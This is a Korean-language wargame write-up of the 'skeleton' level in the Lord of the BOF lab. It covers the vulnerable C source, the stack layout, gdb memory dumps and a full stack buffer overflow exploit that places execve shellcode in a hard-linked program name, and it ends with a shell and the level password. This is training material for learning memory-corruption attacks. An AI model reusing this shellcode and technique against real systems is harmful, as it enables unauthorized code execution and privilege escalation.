[redhat-lob] (10) skeleton¶
Source Code¶
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc;
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
Vulnerabliity Vector¶
main 함수의 ret를 덮어씌워 오버플로우를 발생시킨다.
==============================
LOW
------------------------------
local variables of main
saved registers of main
return address of main <<- overflow
argc
argv
envp
stack from startup code
argc
argv pointers
NULL that ends argv[]
environment pointers
NULL that ends envp[]
ELF Auxiliary Table
argv strings
environment strings
program name
NULL
------------------------------
HIGH (0xC0000000)
==============================
Segmentation fault¶
Overflow condition
- environ을 초기화하여 환경 변수 사용를 통한 쉘코드 삽입이 불가능하다.
- argv[1] value의 47번째 문자가 "\xbf"이어야 함
- argv[1] 값의 길이가 48 미만 이어야 함
- argv[0] 값, argv[1] 값을 초기화하여 argv[0], argv[1] 주소로 버퍼오버플로우를 진행할 수 없다.
※ 시작시 bash2 명령을 입력하고 bash2 쉘 상태에서 진행.
$ bash2
$ ./skeleton `python -c 'print "a"*47'`
stack is still your friend.
$ ./skeleton `python -c 'print "a"*47+"\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa▒
Segmentation fault
exploit¶
프로그램 이름에 쉘코드 삽입¶
기존에 사용한 쉘코드에는 "\x2f" 값이 있기 때문에 정상적으로 쉘코드가 동작하지 않는다.
"\x2f"가 없는 쉘코드로 파일명을 생성하도록 한다.
$ ln skeleton2 `python -c 'print "\x90"*40+"\x31\xc0\x50\xba\x11\x11\x11\x11\x81\xc2\x1e\x1e\x62\x57\x52\xba\x11\x11\x11\x11\x81\xc2\x1e\x51\x58\x5d\x52\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
$ gdb -q `python -c 'print "\x90"*40+"\x31\xc0\x50\xba\x11\x11\x11\x11\x81\xc2\x1e\x1e\x62\x57\x52\xba\x11\x11\x11\x11\x81\xc2\x1e\x51\x58\x5d\x52\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
(gdb) b* main
Breakpoint 1 at 0x8048500
(gdb) r `python -c 'print "a"*47+"\xbf"'`
Starting program: /home/vampire/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒P▒▒▒bWR▒▒▒QX]R▒▒PS▒▒1Ұ
̀ `python -c 'print "a"*47+"\xbf"'`
/bin/bash: /home/troll/.bashrc: Permission denied
Breakpoint 1, 0x8048500 in main ()
(gdb) x/100x $esp
==========================================================================
0xbffffa0c: 0x400309cb 0x00000002 0xbffffa54 0xbffffa60
0xbffffa1c: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffffa2c: 0x08048471 0x08048500 0x00000002 0xbffffa54
0xbffffa3c: 0x08048390 0x080486ac 0x4000ae60 0xbffffa4c
0xbffffa4c: 0x40013e90 0x00000002 0xbffffb4c 0xbffffbe6
0xbffffa5c: 0x00000000 0xbffffc17 0xbffffc39 0xbffffc43
0xbffffa6c: 0xbffffc51 0xbffffc70 0xbffffc80 0xbffffc99
0xbffffa7c: 0xbffffcb4 0xbffffcbf 0xbffffccd 0xbffffd0e
(중략)
0xbfffff5c: 0x35333b31 0x682f003a 0x2f656d6f 0x706d6176
0xbfffff6c: 0x2f657269 0x90909090 0x90909090 0x90909090
0xbfffff7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffcc: 0x90909090 0x90909090 0xba50c031 0x11111111
0xbfffffdc: 0x1e1ec281 0xba525762 0x11111111 0x511ec281
0xbfffffec: 0x89525d58 0x895350e3 0xb0d231e1 0x0080cd0b
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
==========================================================================
program명 주소를 찾아서 RET로 덮어씌우면 됩니다.
program name 쉘코드 실행¶
==============================
LOW
------------------------------
local variables of main
saved registers of main
return address of main <<- overflow
argc
argv
envp
stack from startup code
argc
argv pointers
NULL that ends argv[]
environment pointers
NULL that ends envp[]
ELF Auxiliary Table
argv strings
environment strings
program name ->> shellcode
NULL
------------------------------
HIGH (0xC0000000)
==============================
$ ./`python -c 'print "\x90"*100+"\x31\xc0\x50\xba\x11\x11\x11\x11\x81\xc2\x1e\x1e\x62\x57\x52\xba\x11\x11\x11\x11\x81\xc2\x1e\x51\x58\x5d\x52\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` `python -c 'print "a"*44+"\xbc\xff\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa▒▒▒▒
bash$ whoami
skeleton
bash$ my-pass
euid = 510
shellcoder